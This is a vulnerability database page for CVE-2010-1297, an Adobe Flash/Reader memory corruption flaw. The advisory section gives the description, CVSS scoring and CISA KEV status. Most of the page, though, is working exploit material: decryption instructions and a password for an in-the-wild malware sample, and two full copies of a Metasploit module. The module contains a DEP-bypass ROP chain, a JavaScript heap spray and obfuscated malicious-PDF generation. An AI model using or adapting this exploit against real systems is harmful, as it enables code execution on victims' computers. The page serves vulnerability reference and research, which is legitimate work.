CVE-2010-1297 : Detail

CVE-2010-1297

7.8
/
High
Overflow
87.41%V3
Local
2010-06-08
18h00 +00:00
2025-02-04
21h45 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64; Adobe AIR before 2.0.2.12610; and Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, related to authplay.dll and the ActionScript Virtual Machine 2 (AVM2) newfunction instruction, as exploited in the wild in June 2010.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-787 Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Adobe Flash Player Memory Corruption Vulnerability

Required action : The impacted product is end-of-life and should be disconnected if still in use.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2022-06-07 22h00 +00:00

Action is due : 2022-06-21 22h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 13787

Publication date : 2010-06-08 22h00 +00:00
Author : anonymous
EDB Verified : Yes

# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/ # File is malicious! Taken from the wild! Beware! # To decrypt the file: # openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar # Password is "edb" without the quotes. NOTE: This was taken out of live malware and was not modified. BEWARE. By visiting the following link, you agree that you are responsible for any damages that occur. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)
Exploit Database EDB-ID : 16614

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: adobe_flashplayer_newfunction.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use', 'Description' => %q{ This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2010-1297'], ['OSVDB', '65141'], ['BID', '40586'], ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], # For SWF->PDF embedding ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd [ 'Automatic', { }], ], 'DisclosureDate' => 'Jun 04 2010', 'DefaultTarget' => 0)) end def exploit # load the static swf file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-1297.swf" ) fd = File.open( path, "rb" ) @swf_data = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, request) print_status("Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}") js_data = make_js(regenerate_payload(cli).encoded) pdf_data = make_pdf(@swf_data, js_data) send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end def make_js(encoded_payload) # The following executes a ret2lib using BIB.dll # The effect is to bypass DEP and execute the shellcode in an indirect way stack_data = [ 0xc0c0c0c, 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret 0xcccccccc, 0x70048ef, # xchg eax,esp / ret 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] 0xcccccccc, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009033, # ret 0x18 0x7009084, # ret 0xc0c0c0c, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7001599, # pop ebp / ret 0x10124, 0x70072f7, # pop eax / ret 0x10104, 0x70015bb, # pop ecx / ret 0x1000, 0x700154d, # mov [eax], ecx / ret 0x70015bb, # pop ecx / ret 0x7ffe0300, # -- location of KiFastSystemCall 0x7007fb2, # mov eax, [ecx] / ret 0x70015bb, # pop ecx / ret 0x10011, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70015bb, # pop ecx / ret 0x10100, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70072f7, # pop eax / ret 0x10011, 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 0x7005c54, # pop esi / add esp,0x14 / ret 0xffffffff, 0x10100, 0x0, 0x10104, 0x1000, 0x40, # The next bit effectively copies data from the interleaved stack to the memory # pointed to by eax # The data copied is: # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83 # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90 0x700d731, # mov eax, [ebp-0x24] / ret 0x70015bb, # pop ecx / ret 0x9054905a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5815eb5a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x18891a8b, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x8304c083, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xfb8104c2, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xc0c0c0c, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5ebee75, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xffffe6e8, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x909090ff, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90ffffff, 0x700154d, # mov [eax], ecx / ret 0x700d731, # mov eax, [ebp-0x24] / ret 0x700112f # call eax -- (execute stub to transition to full shellcode) ].pack('V*') var_unescape = rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_start = rand_text_alpha(rand(100) + 1) var_s = 0x10000 var_c = rand_text_alpha(rand(100) + 1) var_b = rand_text_alpha(rand(100) + 1) var_d = rand_text_alpha(rand(100) + 1) var_3 = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) var_4 = rand_text_alpha(rand(100) + 1) payload_buf = '' payload_buf << stack_data payload_buf << encoded_payload escaped_payload = Rex::Text.to_unescape(payload_buf) js = %Q| var #{var_unescape} = unescape; var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); #{var_b} += #{var_shellcode}; #{var_b} += #{var_c}; #{var_d} = #{var_b}.substring(0, #{var_s}/2); while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); var #{var_4} = new Array(); for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; | js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(swf, js) swf_name = rand_text_alpha(8 + rand(8)) + ".swf" xref = [] eol = "\n" endobj = "endobj" << eol # Randomize PDF version? pdf = "%PDF-1.5" << eol #pdf << "%" << RandomNonASCIIString(4) << eol # catalog xref << pdf.length pdf << ioDef(1) << nObfu("<</Type/Catalog") pdf << nObfu("/Pages ") << ioRef(3) pdf << nObfu("/OpenAction ") << ioRef(5) pdf << nObfu(">>") pdf << eol << endobj # pages array xref << pdf.length pdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj # page 1 xref << pdf.length pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) pdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ") pdf << nObfu(">>") pdf << eol << endobj # js action xref << pdf.length pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << endobj # swf annotation object xref << pdf.length pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia") pdf << nObfu("/Rect [20 20 187 69] ") pdf << nObfu("/RichMediaSettings ") << ioRef(8) pdf << nObfu("/RichMediaContent ") << ioRef(9) pdf << nObfu("/NM (") << swf_name << nObfu(")") pdf << nObfu(">>") pdf << eol << endobj # rich media settings xref << pdf.length pdf << ioDef(8) pdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash") pdf << nObfu("/Activation ") << ioRef(10) pdf << nObfu("/Deactivation ") << ioRef(11) pdf << nObfu(">>") pdf << eol << endobj # rich media content xref << pdf.length pdf << ioDef(9) pdf << nObfu("<</Type/RichMediaContent") pdf << nObfu("/Assets ") << ioRef(12) pdf << nObfu("/Configurations [") << ioRef(14) << "]" pdf << nObfu(">>") pdf << eol << endobj # rich media activation / deactivation xref << pdf.length pdf << ioDef(10) pdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(11) pdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>") pdf << eol << endobj # rich media assets xref << pdf.length pdf << ioDef(12) pdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>") pdf << eol << endobj # swf embeded file ref xref << pdf.length pdf << ioDef(13) pdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>") pdf << eol << endobj # rich media configuration xref << pdf.length pdf << ioDef(14) pdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash") pdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>") pdf << eol << endobj # rich media isntance xref << pdf.length pdf << ioDef(15) pdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash") pdf << nObfu("/Asset ") << ioRef(13) pdf << nObfu(">>") pdf << eol << endobj # swf stream # NOTE: This data is already compressed, no need to compress it again... xref << pdf.length pdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol pdf << "stream" << eol pdf << swf << eol pdf << "endstream" << eol pdf << endobj # trailing stuff xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol pdf end end
Exploit Database EDB-ID : 16687

Publication date : 2010-09-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: adobe_flashplayer_newfunction.rb 10477 2010-09-25 11:59:02Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use', 'Description' => %q{ This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], 'Version' => '$Revision: 10477 $', 'References' => [ ['CVE', '2010-1297'], ['OSVDB', '65141'], ['BID', '40586'], ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], # For SWF->PDF embedding ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd [ 'Automatic', { }], ], 'DisclosureDate' => 'Jun 04 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit swf_data = make_swf() js_data = make_js(payload.encoded) # Create the pdf pdf = make_pdf(swf_data, js_data) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def make_swf # load the static swf file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-1297.swf" ) fd = File.open( path, "rb" ) swf_data = fd.read(fd.stat.size) fd.close swf_data end def make_js(encoded_payload) # The following executes a ret2lib using BIB.dll # The effect is to bypass DEP and execute the shellcode in an indirect way stack_data = [ 0xc0c0c0c, 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret 0xcccccccc, 0x70048ef, # xchg eax,esp / ret 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] 0xcccccccc, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009033, # ret 0x18 0x7009084, # ret 0xc0c0c0c, 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7009084, # ret 0x7001599, # pop ebp / ret 0x10124, 0x70072f7, # pop eax / ret 0x10104, 0x70015bb, # pop ecx / ret 0x1000, 0x700154d, # mov [eax], ecx / ret 0x70015bb, # pop ecx / ret 0x7ffe0300, # -- location of KiFastSystemCall 0x7007fb2, # mov eax, [ecx] / ret 0x70015bb, # pop ecx / ret 0x10011, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70015bb, # pop ecx / ret 0x10100, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70072f7, # pop eax / ret 0x10011, 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 0x7005c54, # pop esi / add esp,0x14 / ret 0xffffffff, 0x10100, 0x0, 0x10104, 0x1000, 0x40, # The next bit effectively copies data from the interleaved stack to the memory # pointed to by eax # The data copied is: # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83 # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90 0x700d731, # mov eax, [ebp-0x24] / ret 0x70015bb, # pop ecx / ret 0x9054905a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5815eb5a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x18891a8b, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x8304c083, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xfb8104c2, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xc0c0c0c, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x5ebee75, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xffffe6e8, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x909090ff, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90909090, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90ffffff, 0x700154d, # mov [eax], ecx / ret 0x700d731, # mov eax, [ebp-0x24] / ret 0x700112f # call eax -- (execute stub to transition to full shellcode) ].pack('V*') var_unescape = rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_start = rand_text_alpha(rand(100) + 1) var_s = 0x10000 var_c = rand_text_alpha(rand(100) + 1) var_b = rand_text_alpha(rand(100) + 1) var_d = rand_text_alpha(rand(100) + 1) var_3 = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) var_4 = rand_text_alpha(rand(100) + 1) payload_buf = '' payload_buf << stack_data payload_buf << encoded_payload escaped_payload = Rex::Text.to_unescape(payload_buf) js = %Q| var #{var_unescape} = unescape; var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); #{var_b} += #{var_shellcode}; #{var_b} += #{var_c}; #{var_d} = #{var_b}.substring(0, #{var_s}/2); while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); var #{var_4} = new Array(); for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; | js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(swf, js) swf_name = rand_text_alpha(8 + rand(8)) + ".swf" xref = [] eol = "\n" endobj = "endobj" << eol # Randomize PDF version? pdf = "%PDF-1.5" << eol #pdf << "%" << RandomNonASCIIString(4) << eol # catalog xref << pdf.length pdf << ioDef(1) << nObfu("<</Type/Catalog") pdf << nObfu("/Pages ") << ioRef(3) pdf << nObfu("/OpenAction ") << ioRef(5) pdf << nObfu(">>") pdf << eol << endobj # pages array xref << pdf.length pdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj # page 1 xref << pdf.length pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) pdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ") pdf << nObfu(">>") pdf << eol << endobj # js action xref << pdf.length pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << endobj # swf annotation object xref << pdf.length pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia") pdf << nObfu("/Rect [20 20 187 69] ") pdf << nObfu("/RichMediaSettings ") << ioRef(8) pdf << nObfu("/RichMediaContent ") << ioRef(9) pdf << nObfu("/NM (") << swf_name << nObfu(")") pdf << nObfu(">>") pdf << eol << endobj # rich media settings xref << pdf.length pdf << ioDef(8) pdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash") pdf << nObfu("/Activation ") << ioRef(10) pdf << nObfu("/Deactivation ") << ioRef(11) pdf << nObfu(">>") pdf << eol << endobj # rich media content xref << pdf.length pdf << ioDef(9) pdf << nObfu("<</Type/RichMediaContent") pdf << nObfu("/Assets ") << ioRef(12) pdf << nObfu("/Configurations [") << ioRef(14) << "]" pdf << nObfu(">>") pdf << eol << endobj # rich media activation / deactivation xref << pdf.length pdf << ioDef(10) pdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(11) pdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>") pdf << eol << endobj # rich media assets xref << pdf.length pdf << ioDef(12) pdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>") pdf << eol << endobj # swf embeded file ref xref << pdf.length pdf << ioDef(13) pdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>") pdf << eol << endobj # rich media configuration xref << pdf.length pdf << ioDef(14) pdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash") pdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>") pdf << eol << endobj # rich media isntance xref << pdf.length pdf << ioDef(15) pdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash") pdf << nObfu("/Asset ") << ioRef(13) pdf << nObfu(">>") pdf << eol << endobj # swf stream # NOTE: This data is already compressed, no need to compress it again... xref << pdf.length pdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol pdf << "stream" << eol pdf << swf << eol pdf << "endstream" << eol pdf << endobj # trailing stuff xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol pdf end end
Exploit Database EDB-ID : 14853

Publication date : 2010-08-31 22h00 +00:00
Author : Abysssec
EDB Verified : Yes

